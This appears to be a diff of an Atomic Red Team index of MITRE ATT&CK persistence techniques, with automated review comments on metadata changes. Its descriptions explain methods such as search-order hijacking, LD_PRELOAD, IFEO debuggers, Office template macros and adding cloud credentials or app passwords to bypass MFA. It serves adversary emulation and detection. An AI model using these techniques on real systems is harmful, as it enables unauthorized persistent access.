sudo rm /tmp/T1543_004_atomicredteam.txt
T1574.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:25:57.059Z'
name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -62749,6 +63170,7 @@ persistence:
phase_name: defense-evasion
x_mitre_contributors:
- Stefan Kanthak
+ x_mitre_deprecated: false
x_mitre_detection: |
Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
@@ -62756,7 +63178,6 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -62776,29 +63197,31 @@ persistence:
id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
created: '2020-03-13T17:48:58.999Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/008
external_id: T1574.008
+ - source_name: Microsoft Environment Property
+ description: Microsoft. (2011, October 24). Environment Property. Retrieved
+ July 27, 2016.
+ url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
- source_name: Microsoft CreateProcess
- description: Microsoft. (n.d.). CreateProcess function. Retrieved December
- 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms682425
+ description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+ - source_name: Microsoft WinExec
+ description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
- source_name: Windows NT Command Shell
description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
December 5, 2014.
url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
- - source_name: Microsoft WinExec
- description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms687393
- - source_name: Microsoft Environment Property
- description: Microsoft. (2011, October 24). Environment Property. Retrieved
- July 27, 2016.
- url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.008
atomic_tests:
- name: powerShell Persistence via hijacking default modules - Get-Variable.exe
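Review bot: the reference refresh (CreateProcess and WinExec now point at learn.microsoft.com with September 12, 2024 retrieval dates, plus a reorder and the new `revoked: false`) and the `x_mitre_attack_spec_version` bump to 3.2.0 arrive with `modified` set to 2024-09-12, but `x_mitre_version` stays at '1.0' in the unchanged context just above. That is consistent if upstream only refreshed citations without bumping the technique version; a quick check that the generator is not dropping a version change would settle it. The `Windows NT Command Shell` entry keeps its 2014 retrieval date and a previous-versions URL, so it is the one most likely to go stale next.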
@@ -62891,7 +63314,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1505.003
atomic_tests:
- name: Web Shell Written to Disk
@@ -62935,7 +63357,7 @@ persistence:
name: command_prompt
T1078.001:
technique:
- modified: '2024-03-07T14:27:04.770Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Default Accounts'
description: |-
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -62950,6 +63372,7 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: Monitor whether default accounts have been activated or logged
into. These audits should also include checks on any appliances and applications
@@ -62958,18 +63381,18 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -63001,9 +63424,6 @@ persistence:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.001
atomic_tests:
- name: Enable Guest account with RDP capability and admin privileges
@@ -63153,7 +63573,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.003
atomic_tests:
- name: Create a new time provider
@@ -63232,7 +63651,7 @@ persistence:
url: https://bash.cyberciti.biz/guide/Trap_statement
description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21,
2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T16:43:02.273Z'
name: 'Event Triggered Execution: Trap'
description: |-
Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The trap
command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c
and ctrl+d
.
@@ -63258,8 +63677,6 @@ persistence:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.005
atomic_tests:
- name: Trap EXIT
@@ -63350,7 +63767,7 @@ persistence:
name: sh
T1574.006:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:40.146Z'
name: 'Hijack Execution Flow: LD_PRELOAD'
description: "Adversaries may execute their own malicious payloads by hijacking
environment variables the dynamic linker uses to load shared libraries. During
@@ -63471,7 +63888,6 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1574.006
atomic_tests:
- name: Shared Library Injection via /etc/ld.so.preload
@@ -63659,7 +64075,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1136.001
atomic_tests:
- name: Create a user account on a Linux system
@@ -63935,7 +64350,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.004
atomic_tests:
- name: Winlogon Shell Key Persistence - PowerShell
@@ -64168,7 +64582,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.004
atomic_tests:
- name: Modify SSH Authorized Keys
@@ -64241,7 +64654,7 @@ persistence:
description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December
18, 2017.
source_name: Symantec Ushedix June 2008
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.112Z'
name: 'Event Triggered Execution: Image File Execution Options Injection'
description: |-
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe
). (Citation: Microsoft Dev Blog IFEO Mar 2010)
@@ -64274,8 +64687,6 @@ persistence:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.012
atomic_tests:
- name: IFEO Add Debugger
@@ -64402,7 +64813,7 @@ persistence:
description: 'Stefan Kanthak. (2015, December 8). Executable installers are
vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
of privilege. Retrieved December 4, 2014.'
- modified: '2020-10-27T14:49:39.188Z'
+ modified: '2020-03-26T19:20:23.030Z'
name: Executable Installer File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
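Review bot: besides the `modified` regression (2020-10-27 to 2020-03-26), the context lines carry a reference whose retrieval date precedes its publication date: the Stefan Kanthak post is dated December 8, 2015 but is marked "Retrieved December 4, 2014". That is upstream ATT&CK data rather than something this patch introduces, but since the object is being regenerated anyway it is worth reporting upstream instead of carrying it forward.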
@@ -64437,12 +64848,10 @@ persistence:
- Administrator
- User
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1546.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:33:18.602Z'
name: 'Event Triggered Execution: Accessibility Features'
description: |-
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
@@ -64519,7 +64928,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.008
atomic_tests:
- name: Attaches Command Prompt as a Debugger to a List of Target Processes
@@ -64706,7 +65114,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1136.002
atomic_tests:
- name: Create a new Windows domain admin user
@@ -64938,7 +65345,7 @@ persistence:
health and make sure it's not already dying on you. Retrieved October 2,
2018.
source_name: ITWorld Hard Disk Health Dec 2014
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-01T20:43:55.632Z'
name: Component Firmware
description: |-
Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
@@ -64968,55 +65375,10 @@ persistence:
- SYSTEM
x_mitre_system_requirements:
- Ability to update component device firmware from the host operating system.
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1137.001:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21
- type: attack-pattern
- created: '2019-11-07T20:29:17.788Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1137.001
- url: https://attack.mitre.org/techniques/T1137/001
- - url: https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea
- description: Microsoft. (n.d.). Change the Normal template (Normal.dotm).
- Retrieved July 3, 2017.
- source_name: Microsoft Change Normal Template
- - url: https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office
- description: Austin, J. (2017, June 6). Getting Started with VBA in Office.
- Retrieved July 3, 2017.
- source_name: MSDN VBA in Office
- - url: https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/
- description: Nelson, M. (2014, January 23). Maintaining Access with normal.dotm.
- Retrieved July 3, 2017.
- source_name: enigma0x3 normal.dotm
- - url: http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/
- description: Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62.
- Retrieved July 3, 2017.
- source_name: Hexacorn Office Template Macros
- - source_name: GlobalDotName Jun 2019
- url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
- description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
- - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
- - source_name: CrowdStrike Outlook Forms
- url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
- description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
- Movement and Persistence. Retrieved February 5, 2019.
- - source_name: Outlook Today Home Page
- url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
- description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
- Retrieved February 5, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:01:35.918Z'
name: 'Office Application Startup: Office Template Macros.'
description: "Adversaries may abuse Microsoft Office templates to obtain persistence
on a compromised system. Microsoft Office contains templates that are part
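Review bot: most of this hunk is a key reorder rather than a change: `x_mitre_platforms`, `x_mitre_domains`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and the entire `external_references` list are deleted here and re-added with the same values (platforms aside) in the later +65433 hunk for the same object. Emitting keys in a stable order would reduce this to the real edits, namely `modified` moving to 2024-10-15 and the platform rename. In context, the technique `name` 'Office Application Startup: Office Template Macros.' carries a trailing period that the other names in this file lack; pre-existing, but worth normalising upstream if the name is used as a display string.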
@@ -65047,6 +65409,7 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: 'Many Office-related persistence mechanisms require changes
to the Registry and for binaries, files, or scripts to be written to disk
or existing files modified to include malicious scripts. Collect events related
@@ -65056,9 +65419,13 @@ persistence:
also be investigated since the base templates should likely not contain VBA
macros. Changes to the Office macro security settings should also be investigated.(Citation:
GlobalDotName Jun 2019)'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Creation'
- 'Windows Registry: Windows Registry Key Modification'
@@ -65066,11 +65433,47 @@ persistence:
- 'Process: Process Creation'
- 'Windows Registry: Windows Registry Key Creation'
- 'File: File Modification'
- x_mitre_permissions_required:
- - User
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21
+ created: '2019-11-07T20:29:17.788Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1137/001
+ external_id: T1137.001
+ - source_name: MSDN VBA in Office
+ description: Austin, J. (2017, June 6). Getting Started with VBA in Office.
+ Retrieved July 3, 2017.
+ url: https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office
+ - source_name: Hexacorn Office Template Macros
+ description: Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62.
+ Retrieved July 3, 2017.
+ url: http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/
+ - source_name: Microsoft Change Normal Template
+ description: Microsoft. (n.d.). Change the Normal template (Normal.dotm).
+ Retrieved July 3, 2017.
+ url: https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea
+ - source_name: enigma0x3 normal.dotm
+ description: Nelson, M. (2014, January 23). Maintaining Access with normal.dotm.
+ Retrieved July 3, 2017.
+ url: https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/
+ - source_name: CrowdStrike Outlook Forms
+ description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
+ Movement and Persistence. Retrieved February 5, 2019.
+ url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
+ - source_name: GlobalDotName Jun 2019
+ description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
+ - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
+ url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
+ - source_name: Outlook Today Home Page
+ description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
+ Retrieved February 5, 2019.
+ url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1137.001
atomic_tests:
- name: Injecting a Macro into the Word Normal.dotm Template for Persistence via
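Review bot: `x_mitre_permissions_required` (`User`, `Administrator`) is removed outright with nothing replacing it, while `revoked: false` and the reordered `external_references` come back in. Any consumer that renders or filters on permissions required (documentation templates, index generators) has to tolerate the missing key; a grep of the consumers for `x_mitre_permissions_required` would confirm. Within this patch the treatment is inconsistent: the first hunk in this section and the T1547.005, T1546.005 and T1546.012 hunks keep that field on their objects.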
@@ -65198,7 +65601,7 @@ persistence:
description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls.
Retrieved December 18, 2017.
source_name: Sysinternals AppCertDlls Oct 2007
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.052Z'
name: 'Event Triggered Execution: AppCert DLLs'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by AppCert DLLs loaded into processes.
@@ -65246,8 +65649,6 @@ persistence:
x_mitre_effective_permissions:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.009
atomic_tests:
- name: Create registry persistence via AppCert DLL
@@ -65292,7 +65693,7 @@ persistence:
elevation_required: true
T1098.005:
technique:
- modified: '2023-10-03T17:38:39.065Z'
+ modified: '2024-09-25T20:39:53.597Z'
name: Device Registration
description: "Adversaries may register a device to an adversary-controlled account.
Devices may be registered in a multifactor authentication (MFA) system, which
@@ -65305,16 +65706,16 @@ persistence:
FireEye SolarWinds) In some cases, the MFA self-enrollment process may require
only a username and password to enroll the account's first device or to enroll
a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n\nSimilarly,
- an adversary with existing access to a network may register a device to Azure
- AD and/or its device management system, Microsoft Intune, in order to access
+ an adversary with existing access to a network may register a device to Entra
+ ID and/or its device management system, Microsoft Intune, in order to access
sensitive data or resources while bypassing conditional access policies.(Citation:
AADInternals - Device Registration)(Citation: AADInternals - Conditional Access
- Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may
+ Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Entra ID may
be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)
campaigns via intra-organizational emails, which are less likely to be treated
as suspicious by the email client.(Citation: Microsoft - Device Registration)
Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)
- on an Azure AD tenant by registering a large number of devices.(Citation:
+ on an Entra ID tenant by registering a large number of devices.(Citation:
AADInternals - BPRT)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -65326,16 +65727,16 @@ persistence:
- Mike Moran
- Joe Gumke, U.S. Bank
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- Windows
- - SaaS
- x_mitre_version: '1.2'
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Active Directory: Active Directory Object Creation'
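Review bot: `SaaS` is dropped from T1098.005's platforms together with `Azure AD`, leaving only `Windows` and `Identity Provider`. Because the T1556.007 and T1078.001 hunks keep `SaaS` while swapping out the other names, this is a narrowing rather than a rename; if a SaaS-specific index is generated from this file, the technique will drop out of it, which should be intentional (the `x_mitre_version` move from '1.2' to '1.3' suggests it is upstream's decision).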
@@ -65390,7 +65791,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1542:
technique:
@@ -65451,7 +65851,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.015:
technique:
@@ -65527,7 +65926,7 @@ persistence:
url: https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1
description: Apple. (2018, June 4). Launch Services Keys. Retrieved October
5, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T16:36:37.042Z'
name: 'Boot or Logon Autostart Execution: Login Items'
description: |-
Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call SMLoginItemSetEnabled
.
@@ -65555,8 +65954,6 @@ persistence:
- 'File: File Modification'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1547.015
atomic_tests:
- name: Persistence by modifying Windows Terminal profile
@@ -65655,7 +66052,7 @@ persistence:
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
source_name: Hartrell cd00r 2002
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:31:23.996Z'
name: Port Knocking
description: |-
Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -65680,23 +66077,21 @@ persistence:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1098.001:
technique:
- modified: '2024-02-28T14:35:00.862Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Account Manipulation: Additional Cloud Credentials'
description: "Adversaries may add adversary-controlled credentials to a cloud
account to maintain persistent access to victim accounts and instances within
the environment.\n\nFor example, adversaries may add credentials for Service
Principals and Applications in addition to existing legitimate credentials
- in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue
- Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include
- both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance)
- With sufficient permissions, there are a variety of ways to add credentials
- including the Azure Portal, Azure command line interface, and Azure or Az
- PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
+ in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation:
+ Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials
+ include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer
+ Guidance) With sufficient permissions, there are a variety of ways to add
+ credentials including the Azure Portal, Azure command line interface, and
+ Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
infrastructure-as-a-service (IaaS) environments, after gaining access through
[Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries
may generate or import their own SSH keys using either the CreateKeyPair
@@ -65706,11 +66101,15 @@ persistence:
usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation:
Expel Behind the Scenes)\n\nAdversaries may also use the CreateAccessKey
API in AWS or the gcloud iam service-accounts keys create
command
- in GCP to add access keys to an account. If the target account has different
- permissions from the requesting account, the adversary may also be able to
- escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
+ in GCP to add access keys to an account. Alternatively, they may use the CreateLoginProfile
+ API in AWS to add a password that can be used to log into the AWS Management
+ Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation:
+ Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024)
+ If the target account has different permissions from the requesting account,
+ the adversary may also be able to escalate their privileges in the environment
+ (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel
- 2.0) For example, in Azure AD environments, an adversary with the Application
+ 2.0) For example, in Entra ID environments, an adversary with the Application
Administrator role can add a new set of credentials to their application's
service principal. In doing so the adversary would be able to access the service
principal’s roles and permissions, which may be different from those of the
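Review bot: the new description text adds `CreateLoginProfile` as a way to attach a console password to an IAM user, but the `x_mitre_detection` text for this technique (visible in the `-65735` hunk) still only covers Service Principal/Application modifications and SSH key APIs. Since this block is upstream ATT&CK text copied verbatim, it should not be edited here, but the gap is worth raising upstream or covering with an atomic test and matching detection so the index does not describe a path it gives no guidance for.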
@@ -65721,12 +66120,19 @@ persistence:
tied to the permissions of the original user account. These temporary credentials
may remain valid for the duration of their lifetime even if the original account’s
API credentials are deactivated.\n(Citation: Crowdstrike AWS User Federation
- Persistence)"
+ Persistence)\n\nIn Entra ID environments with the app password feature enabled,
+ adversaries may be able to add an app password to a user account.(Citation:
+ Mandiant APT42 Operations 2024) As app passwords are intended to be used with
+ legacy devices that do not support multi-factor authentication (MFA), adding
+ an app password can allow an adversary to bypass MFA requirements. Additionally,
+ app passwords may remain valid even if the user’s primary password is reset.(Citation:
+ Microsoft Entra ID App Passwords)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Expel
- Oleg Kolesnikov, Securonix
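Review bot: `x_mitre_attack_spec_version: 3.2.0` is now emitted between `kill_chain_phases` and `x_mitre_contributors`, and the `-65807` hunk removes the same key together with `x_mitre_modified_by_ref` from the end of the block, so this is a reorder rather than a loss. The key order now appears to follow whatever order the upstream STIX object uses, which means every upstream reorder will churn this file; consider having the generator emit technique keys in a fixed (for example sorted) order so diffs show only real changes.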
@@ -65735,6 +66141,7 @@ persistence:
- Alex Soler, AttackIQ
- Dylan Silva, AWS Security
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
@@ -65743,13 +66150,16 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- - Azure AD
- SaaS
- x_mitre_version: '2.7'
+ - Identity Provider
+ x_mitre_version: '2.8'
x_mitre_data_sources:
- 'User Account: User Account Modification'
+ - 'Active Directory: Active Directory Object Creation'
+ - 'Active Directory: Active Directory Object Modification'
type: attack-pattern
id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd
created: '2020-01-19T16:10:15.008Z'
